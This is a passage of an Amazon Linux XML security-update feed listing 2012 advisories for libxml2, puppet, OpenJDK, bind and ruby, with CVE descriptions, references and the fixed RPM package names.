arch="x86_64"><filename>Packages/kernel-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.30-49.59.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-134</id><title>Amazon Linux - ALAS-2012-134: medium priority package update for libxml2</title><issued date="2012-10-15 12:20:00" /><updated date="2014-09-14 17:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2807:
Multiple integer overflows in libxml2, as used in Google Chrome before 20.0.1132.43, on 64-bit Linux platforms allow remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way libxml2 handled documents that enable entity expansion. A remote attacker could provide a large, specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
835863:
CVE-2012-2807 libxml2 (64-bit): Multiple integer overflows, leading to DoS or possibly other unspecified impact
CVE-2011-3102:
Off-by-one error in libxml2, as used in Google Chrome before 19.0.1084.46, allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via unknown vectors.
A one byte buffer overflow was found in the way libxml2 evaluated certain parts of XML Pointer Language (XPointer) expressions. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
822109:
CVE-2011-3102 libxml: An off-by-one out-of-bounds write by XPointer part evaluation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3102" title="" id="CVE-2011-3102" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2807" title="" id="CVE-2012-2807" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1288.html" title="" id="RHSA-2012:1288" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libxml2-debuginfo" version="2.7.8" release="9.22.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.7.8-9.22.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.8" release="9.22.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.7.8-9.22.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="9.22.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.7.8-9.22.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.8" release="9.22.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.7.8-9.22.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.7.8" release="9.22.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.7.8-9.22.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.8" release="9.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.7.8-9.22.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.8" release="9.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.7.8-9.22.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.7.8" release="9.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.7.8-9.22.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.7.8" release="9.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.7.8-9.22.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.7.8" release="9.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.7.8-9.22.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-135</id><title>Amazon Linux - ALAS-2012-135: low priority package update for puppet</title><issued date="2012-10-15 12:29:00" /><updated date="2014-09-14 17:11:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3867:
lib/puppet/ssl/certificate_authority.rb in Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, does not properly restrict the characters in the Common Name field of a Certificate Signing Request (CSR), which makes it easier for user-assisted remote attackers to trick administrators into signing a crafted agent certificate via ANSI control sequences.
839158:
CVE-2012-3867 puppet: insufficient validation of agent names in CN of SSL certificate requests
CVE-2012-3866:
lib/puppet/defaults.rb in Puppet 2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, uses 0644 permissions for last_run_report.yaml, which allows local users to obtain sensitive configuration information by leveraging access to the puppet master server to read this file.
839135:
CVE-2012-3866 puppet: information leak via world readable last_run_report.yaml
CVE-2012-3865:
Directory traversal vulnerability in lib/puppet/reports/store.rb in Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, when Delete is enabled in auth.conf, allows remote authenticated users to delete arbitrary files on the puppet master server via a .. (dot dot) in a node name.
839131:
CVE-2012-3865 puppet: authenticated clients allowed to delete arbitrary files on the puppet master
CVE-2012-3864:
Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, allows remote authenticated users to read arbitrary files on the puppet master server by leveraging an arbitrary user's certificate and private key in a GET request.
839130:
CVE-2012-3864 puppet: authenticated clients allowed to read arbitrary files from the puppet master
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3864" title="" id="CVE-2012-3864" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3865" title="" id="CVE-2012-3865" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3866" title="" id="CVE-2012-3866" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3867" title="" id="CVE-2012-3867" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="puppet-server" version="2.7.18" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.7.18-1.9.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.7.18" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.7.18-1.9.amzn1.i686.rpm</filename></package><package name="puppet" version="2.7.18" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.7.18-1.9.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.7.18" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.7.18-1.9.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.7.18" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.7.18-1.9.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.7.18" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.7.18-1.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-136</id><title>Amazon Linux - ALAS-2012-136: important priority package update for java-1.6.0-openjdk</title><issued date="2012-10-23 10:38:00" /><updated date="2014-09-14 17:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5086:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans.
Multiple improper permission check issues were discovered in the Beans, Swing, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
Multiple improper permission check issues were discovered in the Beans, Libraries, Swing, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
865428:
CVE-2012-5086 OpenJDK: XMLDecoder sandbox restriction bypass (Beans, 7195917)
CVE-2012-5085:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote authenticated users to have an unspecified impact via unknown vectors related to Networking. NOTE: the Oracle CPU states that this issue has a 0.0 CVSS score. If so, then this is not a vulnerability and this issue should not be included in CVE.
This update disables Gopher protocol support in the java.net package by default. Gopher support can be enabled by setting the newly introduced property, "jdk.net.registerGopherProtocol", to true.
865541:
CVE-2012-5085 OpenJDK: disable Gopher support by default (Gopher, 7189567)
CVE-2012-5081:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect availability, related to JSSE.
It was discovered that the Java Secure Socket Extension (JSSE) SSL/TLS implementation did not properly handle handshake records containing an overly large data length value. An unauthenticated, remote attacker could possibly use this flaw to cause an SSL/TLS server to terminate with an exception.
865370:
CVE-2012-5081 OpenJDK: JSSE denial of service (JSSE, 7186286)
CVE-2012-5079:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect integrity via unknown vectors related to Libraries.
It was discovered that java.util.ServiceLoader could create an instance of an incompatible class while performing provider lookup. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
865568:
CVE-2012-5079 OpenJDK: ServiceLoader reject not subtype classes without instantiating (Libraries, 7195919)
CVE-2012-5077:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Security.
It was discovered that the SecureRandom class did not properly protect against the creation of multiple seeders. An untrusted Java application or applet could possibly use this flaw to disclose sensitive information.
865354:
CVE-2012-5077 OpenJDK: SecureRandom mulitple seeders information disclosure (Security, 7167656)
CVE-2012-5075:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, and 5.0 Update 36 and earlier allows remote attackers to affect confidentiality, related to JMX.
It was discovered that the JMX component in OpenJDK could perform certain actions in an insecure manner. An untrusted Java application or applet could possibly use this flaw to disclose sensitive information.
865363:
CVE-2012-5075 OpenJDK: RMIConnectionImpl information disclosure (JMX, 7169888)
CVE-2012-5068:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Multiple improper permission check issues were discovered in the Scripting, JMX, Concurrency, Libraries, and Security components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
865348:
CVE-2012-5068 OpenJDK: RhinoScriptEngine security bypass (Scripting, 7143535)
CVE-2012-4416:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Hotspot.
A bug in the Java HotSpot Virtual Machine optimization code could cause it to not perform array initialization in certain cases. An untrusted Java application or applet could use this flaw to disclose portions of the virtual machine's memory.
856124:
CVE-2012-4416 OpenJDK: uninitialized Array JVM memory disclosure (Hotspot, 7198606)
CVE-2012-3216:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Libraries.
It was discovered that the java.io.FilePermission class exposed the hash code of the canonicalized path name. An untrusted Java application or applet could possibly use this flaw to determine certain system paths, such as the current working directory.
865346:
CVE-2012-3216 OpenJDK: java.io.FilePermission information leak (Libraries, 6631398)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3216" title="" id="CVE-2012-3216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4416" title="" id="CVE-2012-4416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5068" title="" id="CVE-2012-5068" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5075" title="" id="CVE-2012-5075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5077" title="" id="CVE-2012-5077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5079" title="" id="CVE-2012-5079" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5081" title="" id="CVE-2012-5081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5085" title="" id="CVE-2012-5085" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5086" title="" id="CVE-2012-5086" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1384.html" title="" id="RHSA-2012:1384" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.6.0-openjdk" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-137</id><title>Amazon Linux - ALAS-2012-137: important priority package update for java-1.7.0-openjdk</title><issued date="2012-10-23 10:38:00" /><updated date="2014-09-14 17:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5086:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans.
Multiple improper permission check issues were discovered in the Beans, Swing, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
Multiple improper permission check issues were discovered in the Beans, Libraries, Swing, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
865428:
CVE-2012-5086 OpenJDK: XMLDecoder sandbox restriction bypass (Beans, 7195917)
CVE-2012-5085:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote authenticated users to have an unspecified impact via unknown vectors related to Networking. NOTE: the Oracle CPU states that this issue has a 0.0 CVSS score. If so, then this is not a vulnerability and this issue should not be included in CVE.
This update disables Gopher protocol support in the java.net package by default. Gopher support can be enabled by setting the newly introduced property, "jdk.net.registerGopherProtocol", to true.
865541:
CVE-2012-5085 OpenJDK: disable Gopher support by default (Gopher, 7189567)
CVE-2012-5081:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect availability, related to JSSE.
It was discovered that the Java Secure Socket Extension (JSSE) SSL/TLS implementation did not properly handle handshake records containing an overly large data length value. An unauthenticated, remote attacker could possibly use this flaw to cause an SSL/TLS server to terminate with an exception.
865370:
CVE-2012-5081 OpenJDK: JSSE denial of service (JSSE, 7186286)
CVE-2012-5079:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect integrity via unknown vectors related to Libraries.
It was discovered that java.util.ServiceLoader could create an instance of an incompatible class while performing provider lookup. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
865568:
CVE-2012-5079 OpenJDK: ServiceLoader reject not subtype classes without instantiating (Libraries, 7195919)
CVE-2012-5077:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Security.
It was discovered that the SecureRandom class did not properly protect against the creation of multiple seeders. An untrusted Java application or applet could possibly use this flaw to disclose sensitive information.
865354:
CVE-2012-5077 OpenJDK: SecureRandom mulitple seeders information disclosure (Security, 7167656)
CVE-2012-5075:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, and 5.0 Update 36 and earlier allows remote attackers to affect confidentiality, related to JMX.
It was discovered that the JMX component in OpenJDK could perform certain actions in an insecure manner. An untrusted Java application or applet could possibly use this flaw to disclose sensitive information.
865363:
CVE-2012-5075 OpenJDK: RMIConnectionImpl information disclosure (JMX, 7169888)
CVE-2012-5068:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Multiple improper permission check issues were discovered in the Scripting, JMX, Concurrency, Libraries, and Security components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
865348:
CVE-2012-5068 OpenJDK: RhinoScriptEngine security bypass (Scripting, 7143535)
CVE-2012-4416:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Hotspot.
A bug in the Java HotSpot Virtual Machine optimization code could cause it to not perform array initialization in certain cases. An untrusted Java application or applet could use this flaw to disclose portions of the virtual machine's memory.
856124:
CVE-2012-4416 OpenJDK: uninitialized Array JVM memory disclosure (Hotspot, 7198606)
CVE-2012-3216:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Libraries.
It was discovered that the java.io.FilePermission class exposed the hash code of the canonicalized path name. An untrusted Java application or applet could possibly use this flaw to determine certain system paths, such as the current working directory.
865346:
CVE-2012-3216 OpenJDK: java.io.FilePermission information leak (Libraries, 6631398)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3216" title="" id="CVE-2012-3216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4416" title="" id="CVE-2012-4416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5068" title="" id="CVE-2012-5068" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5075" title="" id="CVE-2012-5075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5077" title="" id="CVE-2012-5077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5079" title="" id="CVE-2012-5079" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5081" title="" id="CVE-2012-5081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5085" title="" id="CVE-2012-5085" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5086" title="" id="CVE-2012-5086" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1384.html" title="" id="RHSA-2012:1384" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.3.13.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.3.13.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.3.13.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.3.13.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.3.13.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.3.13.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.3.13.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.3.13.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.3.13.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.3.13.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.3.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-138</id><title>Amazon Linux - ALAS-2012-138: important priority package update for bind</title><issued date="2012-10-23 10:39:00" /><updated date="2014-09-14 17:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5166:
ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
A flaw was found in the way BIND handled certain combinations of resource records. A remote attacker could use this flaw to cause a recursive resolver, or an authoritative server in certain configurations, to lockup.
864273:
CVE-2012-5166 bind: Specially crafted DNS data can cause a lockup in named
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5166" title="" id="CVE-2012-5166" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1363.html" title="" id="RHSA-2012:1363" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-139</id><title>Amazon Linux - ALAS-2012-139: medium priority package update for ruby</title><issued date="2012-10-23 10:43:00" /><updated date="2014-09-14 17:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-4466:
862614:
